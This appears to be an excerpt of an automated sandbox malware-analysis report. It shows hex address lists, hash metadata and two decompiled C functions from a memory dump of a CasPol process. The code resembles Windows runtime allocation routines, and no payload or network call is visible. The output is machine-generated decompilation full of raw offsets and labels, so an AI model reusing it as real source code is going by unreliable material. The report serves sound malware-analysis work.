                                                                        0x013db2b6
                                                                        0x013db456
                                                                        0x013db456
                                                                        0x013db45a
                                                                        0x01422912
                                                                        0x01422914
                                                                        0x01422916
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0142291f
                                                                        0x01422921
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01422927
                                                                        0x00000000
                                                                        0x01422927
                                                                        0x013db460
                                                                        0x013db460
                                                                        0x013db462
                                                                        0x013db464
                                                                        0x0142292e
                                                                        0x01422931
                                                                        0x0142293f
                                                                        0x01422945
                                                                        0x01422945
                                                                        0x01422931
                                                                        0x00000000
                                                                        0x013db464
                                                                        0x013db2bc
                                                                        0x013db2bf
                                                                        0x013db2c5
                                                                        0x013db2c8
                                                                        0x013db2ca
                                                                        0x014227af
                                                                        0x014227af
                                                                        0x013db2d0
                                                                        0x013db2d7
                                                                        0x013db437
                                                                        0x013db2dd
                                                                        0x013db2dd
                                                                        0x013db2dd
                                                                        0x013db2e3
                                                                        0x013db2e5
                                                                        0x013db43e
                                                                        0x013db443
                                                                        0x014227b6
                                                                        0x014227b6
                                                                        0x013db443
                                                                        0x013db2f5
                                                                        0x013db2fa
                                                                        0x013db2fd
                                                                        0x013db2ff
                                                                        0x013db46f
                                                                        0x013db46f
                                                                        0x013db30a
                                                                        0x013db30f
                                                                        0x013db310
                                                                        0x013db315
                                                                        0x013db31b
                                                                        0x013db31c
                                                                        0x013db321
                                                                        0x013db322
                                                                        0x013db329
                                                                        0x013db32b
                                                                        0x013db32d
                                                                        0x014227c2
                                                                        0x014227c2
                                                                        0x014227c5
                                                                        0x014227c7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x014227c9
                                                                        0x014227cb
                                                                        0x014227ce
                                                                        0x014227d0
                                                                        0x014227d2
                                                                        0x014227d2
                                                                        0x014227d5
                                                                        0x014227db
                                                                        0x014227e0
                                                                        0x014227e1
                                                                        0x014227e6
                                                                        0x014227e7
                                                                        0x014227ee
                                                                        0x014227f0
                                                                        0x014227f2
                                                                        0x00000000
                                                                        0x014227f4
                                                                        0x014227f4
                                                                        0x00000000
                                                                        0x014227f4
                                                                        0x014227f2
                                                                        0x014227f7
                                                                        0x014227f9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x014227ff
                                                                        0x00000000
                                                                        0x013db333
                                                                        0x013db333
                                                                        0x013db336
                                                                        0x013db336
                                                                        0x013db33c
                                                                        0x013db341
                                                                        0x013db344
                                                                        0x013db44e
                                                                        0x013db44e
                                                                        0x013db34a
                                                                        0x013db34d
                                                                        0x013db353
                                                                        0x013db358
                                                                        0x013db359
                                                                        0x013db35e
                                                                        0x013db35f
                                                                        0x013db366
                                                                        0x013db368
                                                                        0x013db36a
                                                                        0x014228f2
                                                                        0x014228fe
                                                                        0x01422903
                                                                        0x01422903
                                                                        0x00000000
                                                                        0x013db370
                                                                        0x013db38c
                                                                        0x013db391
                                                                        0x013db393
                                                                        0x0142280a
                                                                        0x0142280a
                                                                        0x013db399
                                                                        0x013db39b
                                                                        0x00000000
                                                                        0x013db3a1
                                                                        0x013db3a1
                                                                        0x013db3a6
                                                                        0x013db3b0
                                                                        0x013db3b2
                                                                        0x0142281d
                                                                        0x013db3b8
                                                                        0x013db3b8
                                                                        0x013db3b8
                                                                        0x013db3ba
                                                                        0x013db3bd
                                                                        0x01422824
                                                                        0x0142282a
                                                                        0x01422831
                                                                        0x01422841
                                                                        0x0142284b
                                                                        0x0142284d
                                                                        0x01422858
                                                                        0x01422858
                                                                        0x01422858
                                                                        0x01422870
                                                                        0x01422870
                                                                        0x01422831
                                                                        0x013db3c3
                                                                        0x013db3c8
                                                                        0x013db3d2
                                                                        0x013db3d4
                                                                        0x01422883
                                                                        0x013db3da
                                                                        0x013db3da
                                                                        0x013db3da
                                                                        0x013db3dc
                                                                        0x013db3df
                                                                        0x0142288f
                                                                        0x01422891
                                                                        0x0142289c
                                                                        0x0142289c
                                                                        0x0142289c
                                                                        0x014228b4
                                                                        0x014228b4
                                                                        0x013db3e5
                                                                        0x013db3ea
                                                                        0x013db3ec
                                                                        0x014228c7
                                                                        0x013db3f2
                                                                        0x013db3f2
                                                                        0x013db3f2
                                                                        0x013db3f7
                                                                        0x013db3fa
                                                                        0x014228d9
                                                                        0x014228d9
                                                                        0x013db400
                                                                        0x013db407
                                                                        0x013db40a
                                                                        0x013db40f
                                                                        0x013db413
                                                                        0x013db41f
                                                                        0x013db424
                                                                        0x013db426
                                                                        0x014228e3
                                                                        0x014228e8
                                                                        0x014228e8
                                                                        0x013db426
                                                                        0x013db42f
                                                                        0x00000000
                                                                        0x013db42f
                                                                        0x013db39b
                                                                        0x013db36a
                                                                        0x013db264
                                                                        0x013db264
                                                                        0x013db279
                                                                        0x013db27f
                                                                        0x013db287
                                                                        0x013db28c
                                                                        0x013db290
                                                                        0x013db29c
                                                                        0x013db2a3
                                                                        0x014227a0
                                                                        0x014227a5
                                                                        0x014227a5
                                                                        0x013db2a3
                                                                        0x013db2a9
                                                                        0x013db2b1
                                                                        0x013db2b1

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ea1f64df11345c03254a0bdf0ea8c13923360817a481ea98dccb31031b519ceb
                                                                        • Instruction ID: 3eb8fe7dd8fd394e7b699096d8f57a97ef2362bb475b662d668db8acb1e4ebb5
                                                                        • Opcode Fuzzy Hash: ea1f64df11345c03254a0bdf0ea8c13923360817a481ea98dccb31031b519ceb
                                                                        • Instruction Fuzzy Hash: 55B10432B0061A9FDB15CBA9C890B7EBBF9AF85308F55026AE641D7395DBB0D940CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013C849B Relevance: .3, Instructions: 290COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 92%
                                                                        			E013C849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x148f9c0);
				E0140D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x14a7b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E013CCEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E013D2280( *[fs:0x30], 0x14a8550);
						_t139 =  *0x14a7b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E013EF3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E013CFFB0(_t193, _t235, 0x14a8550);
								L5:
								return E0140D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E013B1C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x14a7b9c; // 0x0
							_t235 = L013D4620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x14a7b10; // 0x0
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E013EA61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E013CFFB0(_t193, _t235, 0x14a8550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L013D77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L013D77F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x14a7b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x14a7b10; // 0x0
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E013F37C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x14a7b9c; // 0x0
									_t214 = L013D4620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E013F37F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x14a7b10 =  *0x14a7b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x14a7b04 =  *0x14a7b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L013D77F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L013D77F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x14a7b08 =  *0x14a7b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E013F57C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E013FF3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L013D77F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E013EA44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L013D77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E013F96C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

































                                                                        0x013c849b
                                                                        0x013c849b
                                                                        0x013c849b
                                                                        0x013c849b
                                                                        0x013c849d
                                                                        0x013c84a2
                                                                        0x013c84a7
                                                                        0x013c84b1
                                                                        0x013c84d8
                                                                        0x00000000
                                                                        0x013c84b3
                                                                        0x013c84c4
                                                                        0x013c84c9
                                                                        0x013c84cd
                                                                        0x013c84cf
                                                                        0x013c84cf
                                                                        0x013c84d6
                                                                        0x013c84e6
                                                                        0x013c84e9
                                                                        0x013c84ec
                                                                        0x013c84ef
                                                                        0x013c84f2
                                                                        0x013c84f4
                                                                        0x013c84fc
                                                                        0x013c8501
                                                                        0x013c8506
                                                                        0x013c8509
                                                                        0x013c86e0
                                                                        0x013c86e5
                                                                        0x013c86e8
                                                                        0x013c86ed
                                                                        0x013c86f0
                                                                        0x013c86f2
                                                                        0x01419afd
                                                                        0x01419b02
                                                                        0x013c84da
                                                                        0x013c84df
                                                                        0x013c84df
                                                                        0x013c86fa
                                                                        0x013c86fd
                                                                        0x013c86fe
                                                                        0x013c8701
                                                                        0x013c8706
                                                                        0x013c8709
                                                                        0x013c870b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013c8711
                                                                        0x013c8725
                                                                        0x013c8727
                                                                        0x013c872a
                                                                        0x013c872c
                                                                        0x01419af0
                                                                        0x01419af5
                                                                        0x013c8732
                                                                        0x013c8732
                                                                        0x013c8732
                                                                        0x013c8735
                                                                        0x013c8737
                                                                        0x013c8515
                                                                        0x013c8515
                                                                        0x013c8518
                                                                        0x013c851d
                                                                        0x013c8523
                                                                        0x013c8527
                                                                        0x013c852b
                                                                        0x013c8537
                                                                        0x013c8539
                                                                        0x013c853c
                                                                        0x013c853e
                                                                        0x013c868c
                                                                        0x013c8691
                                                                        0x013c8699
                                                                        0x013c869b
                                                                        0x013c8744
                                                                        0x013c8748
                                                                        0x013c86a1
                                                                        0x013c86a1
                                                                        0x013c86a1
                                                                        0x013c86a4
                                                                        0x013c86a8
                                                                        0x01419bdf
                                                                        0x01419bdf
                                                                        0x013c86ae
                                                                        0x013c86b0
                                                                        0x00000000
                                                                        0x013c86b6
                                                                        0x00000000
                                                                        0x01419be9
                                                                        0x013c86b0
                                                                        0x013c8544
                                                                        0x013c854a
                                                                        0x013c854d
                                                                        0x013c8551
                                                                        0x013c876e
                                                                        0x013c8778
                                                                        0x013c877b
                                                                        0x013c8780
                                                                        0x013c8557
                                                                        0x013c8557
                                                                        0x013c855d
                                                                        0x013c855d
                                                                        0x013c856b
                                                                        0x013c856e
                                                                        0x013c8570
                                                                        0x013c8573
                                                                        0x013c8576
                                                                        0x013c8576
                                                                        0x013c8579
                                                                        0x013c857b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013c8581
                                                                        0x013c85a0
                                                                        0x013c85a2
                                                                        0x013c85a5
                                                                        0x013c85a7
                                                                        0x01419b1b
                                                                        0x01419b1b
                                                                        0x013c862e
                                                                        0x013c862e
                                                                        0x013c8631
                                                                        0x013c8631
                                                                        0x013c8634
                                                                        0x013c8636
                                                                        0x013c8669
                                                                        0x013c8669
                                                                        0x013c866b
                                                                        0x01419bbf
                                                                        0x01419bc4
                                                                        0x01419bc8
                                                                        0x01419bce
                                                                        0x01419bce
                                                                        0x013c8671
                                                                        0x013c8671
                                                                        0x013c8674
                                                                        0x013c8676
                                                                        0x01419bae
                                                                        0x01419bae
                                                                        0x013c8676
                                                                        0x013c867c
                                                                        0x013c867e
                                                                        0x013c8688
                                                                        0x013c8688
                                                                        0x00000000
                                                                        0x013c867e
                                                                        0x013c8638
                                                                        0x013c8638
                                                                        0x013c863b
                                                                        0x013c863e
                                                                        0x013c863f
                                                                        0x013c8642
                                                                        0x013c8645
                                                                        0x013c8648
                                                                        0x013c864d
                                                                        0x01419b69
                                                                        0x01419b6e
                                                                        0x01419b7b
                                                                        0x01419b81
                                                                        0x01419b85
                                                                        0x01419b89
                                                                        0x01419ba7
                                                                        0x01419b8b
                                                                        0x01419b91
                                                                        0x01419b9a
                                                                        0x01419b9f
                                                                        0x01419b9f
                                                                        0x013c8788
                                                                        0x013c878d
                                                                        0x013c8763
                                                                        0x013c8763
                                                                        0x013c8766
                                                                        0x00000000
                                                                        0x013c8766
                                                                        0x01419b70
                                                                        0x00000000
                                                                        0x01419b70
                                                                        0x013c8656
                                                                        0x013c865a
                                                                        0x013c865c
                                                                        0x013c8752
                                                                        0x013c8756
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013c875e
                                                                        0x00000000
                                                                        0x013c875e
                                                                        0x013c8662
                                                                        0x013c8662
                                                                        0x013c8662
                                                                        0x013c8666
                                                                        0x00000000
                                                                        0x013c8666
                                                                        0x013c85b7
                                                                        0x013c85b9
                                                                        0x013c85bc
                                                                        0x013c85bf
                                                                        0x013c85cc
                                                                        0x013c85d1
                                                                        0x013c85d4
                                                                        0x013c85db
                                                                        0x013c85de
                                                                        0x013c85e0
                                                                        0x01419b5f
                                                                        0x00000000
                                                                        0x01419b5f
                                                                        0x013c85e6
                                                                        0x013c85ea
                                                                        0x013c86c3
                                                                        0x013c86c5
                                                                        0x013c86c8
                                                                        0x013c86ca
                                                                        0x01419b16
                                                                        0x00000000
                                                                        0x01419b16
                                                                        0x013c86d6
                                                                        0x013c85f6
                                                                        0x013c85f6
                                                                        0x013c85f9
                                                                        0x013c8602
                                                                        0x013c8606
                                                                        0x013c860a
                                                                        0x013c860b
                                                                        0x013c860e
                                                                        0x013c8611
                                                                        0x00000000
                                                                        0x013c8611
                                                                        0x013c85f3
                                                                        0x00000000
                                                                        0x013c85f3
                                                                        0x013c8619
                                                                        0x013c861e
                                                                        0x013c861e
                                                                        0x013c8621
                                                                        0x013c8622
                                                                        0x013c8623
                                                                        0x013c8625
                                                                        0x013c862c
                                                                        0x00000000
                                                                        0x013c873d
                                                                        0x00000000
                                                                        0x013c873d
                                                                        0x013c8737
                                                                        0x013c850f
                                                                        0x013c8512
                                                                        0x00000000
                                                                        0x013c8512
                                                                        0x00000000
                                                                        0x013c84d6

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d1c54b2051365ab88be178cb57803a14d459162a428cc218cd42369e23c344b7
                                                                        • Instruction ID: e176b50d40fe526d052f10ad473f6b9377d36f5de1394055da1831b1138767ac
                                                                        • Opcode Fuzzy Hash: d1c54b2051365ab88be178cb57803a14d459162a428cc218cd42369e23c344b7
                                                                        • Instruction Fuzzy Hash: D2B17CB1E00209DFDB25CFA9C980AADBBB9FF48708F10416EE605AB755D770AD45CB40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013E513A Relevance: .3, Instructions: 258COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 67%
                                                                        			E013E513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x14ad360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E013FD0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E013D2280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L013D4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E013FF3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E013CFFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x14ab1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E013FB640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                                                                        0x013e5142
                                                                        0x013e514c
                                                                        0x013e5150
                                                                        0x013e5157
                                                                        0x013e5159
                                                                        0x013e515e
                                                                        0x013e5165
